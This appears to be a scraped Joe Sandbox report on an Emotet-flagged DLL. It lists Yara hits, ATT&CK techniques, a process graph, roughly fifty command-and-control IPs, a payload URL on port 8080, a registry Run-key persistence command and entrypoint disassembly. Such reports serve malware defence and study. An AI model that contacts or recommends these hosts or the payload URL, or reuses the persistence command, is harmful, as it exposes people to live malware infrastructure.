                      Source: Yara matchFile source: 5.2.rundll32.exe.225b3ac0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.2c323270000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.316359005.0000015CC5300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.463551545.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.320549270.000002C323270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.318872069.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.699725237.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.316792444.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.319281932.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.464095447.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.317583500.00000225B3AC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.700370184.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.315165942.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11
                      Registry Run Keys / Startup Folder
                      111
                      Process Injection
                      21
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium2
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/Job1
                      DLL Side-Loading
                      11
                      Registry Run Keys / Startup Folder
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory21
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Application Layer Protocol
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)1
                      DLL Side-Loading
                      111
                      Process Injection
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Hidden Files and Directories
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Obfuscated Files or Information
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Regsvr32
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Rundll32
                      DCSync24
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      File Deletion
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 745030 Sample: UNUy8dUYWp.dll Startdate: 13/11/2022 Architecture: WINDOWS Score: 84 40 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->40 42 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->42 44 45 other IPs or domains 2->44 52 Snort IDS alert for network traffic 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 Yara detected Emotet 2->56 58 C2 URLs / IPs found in malware configuration 2->58 9 loaddll64.exe 3 2->9         started        12 regsvr32.exe 2 2->12         started        signatures3 process4 signatures5 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->60 14 cmd.exe 1 9->14         started        16 rundll32.exe 2 9->16         started        19 regsvr32.exe 2 9->19         started        23 2 other processes 9->23 21 regsvr32.exe 12->21         started        process6 signatures7 25 rundll32.exe 2 14->25         started        46 Hides that the sample has been downloaded from the Internet (zone.identifier) 16->46 28 regsvr32.exe 16->28         started        30 regsvr32.exe 19->30         started        process8 signatures9 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->62 32 regsvr32.exe 1 25->32         started        process10 dnsIp11 36 115.178.55.22, 49697, 80 SIMAYA-AS-IDPTSimayaJejaringMandiriID Indonesia 32->36 38 172.105.115.71, 49698, 8080 LINODE-APLinodeLLCUS United States 32->38 48 System process connects to network (likely due to code injection or exploit) 32->48 50 Creates an autostart registry key pointing to binary in C:\Windows 32->50 signatures12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      UNUy8dUYWp.dll44%VirustotalBrowse
                      No Antivirus matches
                      SourceDetectionScannerLabelLinkDownload
                      4.2.rundll32.exe.15cc5300000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      12.2.regsvr32.exe.6b0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      3.2.regsvr32.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      0.2.loaddll64.exe.2c323270000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      5.2.rundll32.exe.225b3ac0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.regsvr32.exe.a00000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://172.105.115.71:8080/s.dll0%Avira URL Cloudsafe
                      No contacted domains info
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://172.105.115.71:8080/s.dllregsvr32.exe, 00000006.00000003.559372658.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.556387568.0000000000AAD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.699900412.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.558688739.0000000000AAD000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      172.105.115.71
                      unknownUnited States
                      63949LINODE-APLinodeLLCUStrue
                      188.165.79.151
                      unknownFrance
                      16276OVHFRtrue
                      196.44.98.190
                      unknownGhana
                      327814EcobandGHtrue
                      174.138.33.49
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      36.67.23.59
                      unknownIndonesia
                      17974TELKOMNET-AS2-APPTTelekomunikasiIndonesiaIDtrue
                      103.41.204.169
                      unknownIndonesia
                      58397INFINYS-AS-IDPTInfinysSystemIndonesiaIDtrue
                      85.214.67.203
                      unknownGermany
                      6724STRATOSTRATOAGDEtrue
                      83.229.80.93
                      unknownUnited Kingdom
                      8513SKYVISIONGBtrue
                      198.199.70.22
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      93.104.209.107
                      unknownGermany
                      8767MNET-ASGermanyDEtrue
                      186.250.48.5
                      unknownBrazil
                      262807RedfoxTelecomunicacoesLtdaBRtrue
                      209.239.112.82
                      unknownUnited States
                      30083AS-30083-GO-DADDY-COM-LLCUStrue
                      175.126.176.79
                      unknownKorea Republic of
                      9523MOKWON-AS-KRMokwonUniversityKRtrue
                      128.199.242.164
                      unknownUnited Kingdom
                      14061DIGITALOCEAN-ASNUStrue
                      178.238.225.252
                      unknownGermany
                      51167CONTABODEtrue
                      46.101.98.60
                      unknownNetherlands
                      14061DIGITALOCEAN-ASNUStrue
                      190.145.8.4
                      unknownColombia
                      14080TelmexColombiaSACOtrue
                      82.98.180.154
                      unknownSpain
                      42612DINAHOSTING-ASEStrue
                      103.71.99.57
                      unknownIndia
                      135682AWDHPL-AS-INAdvikaWebDevelopmentsHostingPvtLtdINtrue
                      87.106.97.83
                      unknownGermany
                      8560ONEANDONE-ASBrauerstrasse48DEtrue
                      103.254.12.236
                      unknownViet Nam
                      56151DIGISTAR-VNDigiStarCompanyLimitedVNtrue
                      103.85.95.4
                      unknownIndonesia
                      136077IDNIC-UNSRAT-AS-IDUniversitasIslamNegeriMataramIDtrue
                      202.134.4.210
                      unknownIndonesia
                      7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                      165.22.254.236
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      78.47.204.80
                      unknownGermany
                      24940HETZNER-ASDEtrue
                      118.98.72.86
                      unknownIndonesia
                      7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                      139.59.80.108
                      unknownSingapore
                      14061DIGITALOCEAN-ASNUStrue
                      104.244.79.94
                      unknownUnited States
                      53667PONYNETUStrue
                      37.44.244.177
                      unknownGermany
                      47583AS-HOSTINGERLTtrue
                      51.75.33.122
                      unknownFrance
                      16276OVHFRtrue
                      160.16.143.191
                      unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                      103.56.149.105
                      unknownIndonesia
                      55688BEON-AS-IDPTBeonIntermediaIDtrue
                      85.25.120.45
                      unknownGermany
                      8972GD-EMEA-DC-SXB1DEtrue
                      139.196.72.155
                      unknownChina
                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                      115.178.55.22
                      unknownIndonesia
                      38783SIMAYA-AS-IDPTSimayaJejaringMandiriIDtrue
                      103.126.216.86
                      unknownBangladesh
                      138482SKYVIEW-AS-APSKYVIEWONLINELTDBDtrue
                      128.199.217.206
                      unknownUnited Kingdom
                      14061DIGITALOCEAN-ASNUStrue
                      114.79.130.68
                      unknownIndia
                      45769DVOIS-IND-VoisBroadbandPvtLtdINtrue
                      103.224.241.74
                      unknownIndia
                      133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINtrue
                      210.57.209.142
                      unknownIndonesia
                      38142UNAIR-AS-IDUniversitasAirlanggaIDtrue
                      202.28.34.99
                      unknownThailand
                      9562MSU-TH-APMahasarakhamUniversityTHtrue
                      80.211.107.116
                      unknownItaly
                      31034ARUBA-ASNITtrue
                      54.37.228.122
                      unknownFrance
                      16276OVHFRtrue
                      218.38.121.17
                      unknownKorea Republic of
                      9318SKB-ASSKBroadbandCoLtdKRtrue
                      185.148.169.10
                      unknownGermany
                      44780EVERSCALE-ASDEtrue
                      195.77.239.39
                      unknownSpain
                      60493FICOSA-ASEStrue
                      178.62.112.199
                      unknownEuropean Union
                      14061DIGITALOCEAN-ASNUStrue
                      62.171.178.147
                      unknownUnited Kingdom
                      51167CONTABODEtrue
                      64.227.55.231
                      unknownUnited States
                      14061DIGITALOCEAN-ASNUStrue
                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:745030
                      Start date and time:2022-11-13 18:01:44 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 8m 53s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:UNUy8dUYWp.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Run name:Run with higher sleep bypass
                      Number of analysed new started processes analysed:17
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal84.troj.evad.winDLL@21/2@0/49
                      EGA Information:
                      • Successful, ratio: 100%
                      HDC Information:
                      • Successful, ratio: 58.8% (good quality ratio 53.4%)
                      • Quality average: 60.9%
                      • Quality standard deviation: 31.8%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 61
                      • Number of non-executed functions: 170
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                      • Excluded IPs from analysis (whitelisted): 8.238.85.254, 8.248.139.254, 8.248.143.254, 8.241.126.249, 8.248.145.254
                      • Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      18:03:39AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ZnvQHBfFrAXKVU.dll C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MKDOLrYWnU\ZnvQHBfFrAXKVU.dll"
                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      172.105.115.713sbn8ZI5nn.dllGet hashmaliciousBrowse
                        3sbn8ZI5nn.dllGet hashmaliciousBrowse
                          zzkCIdCoDt.dllGet hashmaliciousBrowse
                            zzkCIdCoDt.dllGet hashmaliciousBrowse
                              U9M1w8FHBW.dllGet hashmaliciousBrowse
                                En3ZIyuYdw.dllGet hashmaliciousBrowse
                                  Kjx74pqege.dllGet hashmaliciousBrowse
                                    U9M1w8FHBW.dllGet hashmaliciousBrowse
                                      En3ZIyuYdw.dllGet hashmaliciousBrowse
                                        Kjx74pqege.dllGet hashmaliciousBrowse
                                          mqMIxHWdwe.dllGet hashmaliciousBrowse
                                            i590SBAZAI.dllGet hashmaliciousBrowse
                                              rbh8gbxi93.dllGet hashmaliciousBrowse
                                                aukDPlAxnc.dllGet hashmaliciousBrowse
                                                  Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                    eki0vpuCvx.dllGet hashmaliciousBrowse
                                                      mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                        i590SBAZAI.dllGet hashmaliciousBrowse
                                                          rbh8gbxi93.dllGet hashmaliciousBrowse
                                                            188.165.79.151UNUy8dUYWp.dllGet hashmaliciousBrowse
                                                              3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                  zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                    zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                      U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                        En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                          Kjx74pqege.dllGet hashmaliciousBrowse
                                                                            U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                              Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                  i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                    rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                      aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                        Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                          eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                            mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                              i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                                  aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                                    No context
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                    LINODE-APLinodeLLCUSUNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.226.75
                                                                                                    i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.115.71
                                                                                                    ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                    • 172.105.226.75
                                                                                                    OVHFRUNUy8dUYWp.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    3sbn8ZI5nn.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    zzkCIdCoDt.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                    • 5.135.247.111
                                                                                                    U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    En3ZIyuYdw.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    U9M1w8FHBW.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    Kjx74pqege.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                    • 94.23.45.86
                                                                                                    i590SBAZAI.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    rbh8gbxi93.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    aukDPlAxnc.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    Hjz5QKa9UZ.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    eki0vpuCvx.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    mqMIxHWdwe.dllGet hashmaliciousBrowse
                                                                                                    • 54.37.228.122
                                                                                                    ozZDLYwvhE.dllGet hashmaliciousBrowse
                                                                                                    • 94.23.45.86
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 62919 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                    Category:dropped
                                                                                                    Size (bytes):62919
                                                                                                    Entropy (8bit):7.995280921994772
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:d+OfVxHl7Wyf11lYom3xQcRVOtPHwQV4rP6Ji7:d+OxHxJlZcuPt4b6q
                                                                                                    MD5:3DCF580A93972319E82CAFBC047D34D5
                                                                                                    SHA1:8528D2A1363E5DE77DC3B1142850E51EAD0F4B6B
                                                                                                    SHA-256:40810E31F1B69075C727E6D557F9614D5880112895FF6F4DF1767E87AE5640D1
                                                                                                    SHA-512:98384BE7218340F95DAE88D1CB865F23A0B4E12855BEB6E74A3752274C9B4C601E493864DB777BCA677A370D0A9DBFFD68D94898A82014537F3A801CCE839C42
                                                                                                    Malicious:false
                                                                                                    Preview:MSCF............,...................I.......Q.........GU.\ .authroot.stl..O..5..CK..<Tk...c_.d....A.K...+.d.-;%.BJII!.QIR..$t)Kd.-QQ*...g......^..~|N=...y....{. .4{...W....b.i...j.I.......1:..b\.0.....Ait.2t......w.%.&.",tL_...4.8L[G..;.57....AT.k.......V..K......(....mzS...G....r.".=H.?>.........x&...S%....X.M^..j...A..x.9`.9...A../.s..#.4#.....Id.w..B....s.8..(...dj....=L.)..s.d.]NxQX8....stV#.K.'7.tH..9u~.2..!..2./.....!..9C../...mP $..../y.....@p.6.}.`...5. 0r.w...@(.. .Q....)g.........m..z*.8rR..).].T9r<.L....0..`.........c.....;-.g..;.wk.)......i..c5.....{v.u...AS..=.....&.:.........+..P.N..9..EAQ.V.$s.......B.`.Mfe..8.......$...y-.q9J........W...2.Q8...O.......i..@\^.=X..dG$.M..#=....m.h..{9.'...-.v..Z...!....z.....N....i..^..,........d...%Xa~q.@D|0...Y.m...........&d.4..A..{t=...../.t.3._.....?-.....uroP?.d.Z..S..{...$.i....X..$.O..4..N.)....U.Z..P....X,.... ...Lg..35..W..s.!c...Ap.].P..8..M..W.......U..,...m.u..|=.m1..~..!..b...._.
                                                                                                    Process:C:\Windows\System32\regsvr32.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):328
                                                                                                    Entropy (8bit):3.1108374798811247
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKL8GTN1HlNiN+SkQlPlEGYRMY9z+4KlDA3RUeKlTAlWRyf1:D8S/kPlE99SNxAhUexYo1
                                                                                                    MD5:56E59C299CCA483D5A95A71F0E9550D5
                                                                                                    SHA1:FFD29F86DB90E58776D15A0F103B49A68D6F4910
                                                                                                    SHA-256:7EADC86EB7664912617756A6CF4D8FA269634E7DF4923FB40892881AF09D29F5
                                                                                                    SHA-512:28923F9D9C821EAA8AB03EDF133E3BC72EB85473A70D6A95EE6D70C38FC83798FFAF634F83D54E0E626DEA7200CD39261AAC7759B582338E82015F6A58C03148
                                                                                                    Malicious:false
                                                                                                    Preview:p...... .........+.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.d.e.4.d.3.9.b.e.8.d.8.1.:.0."...
                                                                                                    File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Entropy (8bit):6.619173449188402
                                                                                                    TrID:
                                                                                                    • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                    • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                    • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                    • DOS Executable Generic (2002/1) 1.70%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                    File name:UNUy8dUYWp.dll
                                                                                                    File size:528896
                                                                                                    MD5:3b7c18542e60716ebb377fce79f27b1e
                                                                                                    SHA1:7df5649f7c8f8ed59f931f08ec0311bbf08d12e1
                                                                                                    SHA256:8ec69127e6c6676189caf841242091ddd3365b52d4bf91967338534cf14eb9e5
                                                                                                    SHA512:e3dc18b0dc0c295e3e10e9980aa3f2e42a22d8356e8190e0fc35a61f94e0e323139b48fe6176b5dac84573d85d866d3264b90b5f7cd7646b9292d130c568fce8
                                                                                                    SSDEEP:6144:mW1239bnTe+0Qv7NSEBj43USaI6Y/jOpxHRikSYI+QALgIJ1divndEXyn:mW1e9PeexPBjvKSpuvYI+TLgs1dcEXy
                                                                                                    TLSH:8BB4F829A59E76F0C951A1F5A0420B1595F33C88FEF68EAF03502F296F6F24425F768C
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................$...s...$...............................$.......$...............`.......`.......e.h.....`.......Rich...........
                                                                                                    Icon Hash:74f0e4ecccdce0e4
                                                                                                    Entrypoint:0x1800044e0
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x180000000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                    Time Stamp:0x636D6724 [Thu Nov 10 21:03:32 2022 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:81146e0614ccc4eb7174ad2ad695dedb
                                                                                                    Instruction
                                                                                                    dec eax
                                                                                                    mov dword ptr [esp+08h], ebx
                                                                                                    dec eax
                                                                                                    mov dword ptr [esp+10h], esi
                                                                                                    push edi
                                                                                                    dec eax
                                                                                                    sub esp, 20h
                                                                                                    dec ecx
                                                                                                    mov edi, eax
                                                                                                    mov ebx, edx
                                                                                                    dec eax
                                                                                                    mov esi, ecx
                                                                                                    cmp edx, 01h
                                                                                                    jne 00007F1F38A68FB7h
                                                                                                    call 00007F1F38A69548h
                                                                                                    dec esp
                                                                                                    mov eax, edi
                                                                                                    mov edx, ebx
                                                                                                    dec eax
                                                                                                    mov ecx, esi
                                                                                                    dec eax
                                                                                                    mov ebx, dword ptr [esp+30h]
                                                                                                    dec eax
                                                                                                    mov esi, dword ptr [esp+38h]
                                                                                                    dec eax
                                                                                                    add esp, 20h
                                                                                                    pop edi
                                                                                                    jmp 00007F1F38A68E2Ch
                                                                                                    int3
                                                                                                    int3
                                                                                                    int3
                                                                                                    inc eax
                                                                                                    push ebx
                                                                                                    dec eax
                                                                                                    sub esp, 20h
                                                                                                    dec eax
                                                                                                    mov ebx, ecx
                                                                                                    dec eax
                                                                                                    mov eax, edx
                                                                                                    dec eax
                                                                                                    lea ecx, dword ptr [00033F0Dh]
                                                                                                    dec eax
                                                                                                    mov dword ptr [ebx], ecx
                                                                                                    dec eax
                                                                                                    lea edx, dword ptr [ebx+08h]
                                                                                                    xor ecx, ecx
                                                                                                    dec eax
                                                                                                    mov dword ptr [edx], ecx
                                                                                                    dec eax
                                                                                                    mov dword ptr [edx+08h], ecx
                                                                                                    dec eax
                                                                                                    lea ecx, dword ptr [eax+08h]
                                                                                                    call 00007F1F38A6B7B1h
                                                                                                    dec eax
                                                                                                    lea eax, dword ptr [00033F1Dh]
                                                                                                    dec eax
                                                                                                    mov dword ptr [ebx], eax
                                                                                                    dec eax
                                                                                                    mov eax, ebx
                                                                                                    dec eax
                                                                                                    add esp, 20h
                                                                                                    pop ebx
                                                                                                    ret
                                                                                                    int3
                                                                                                    xor eax, eax
                                                                                                    dec eax
                                                                                                    mov dword ptr [ecx+10h], eax
                                                                                                    dec eax
                                                                                                    lea eax, dword ptr [00033F13h]
                                                                                                    dec eax
                                                                                                    mov dword ptr [ecx+08h], eax
                                                                                                    dec eax
                                                                                                    lea eax, dword ptr [00033EF8h]
                                                                                                    dec eax
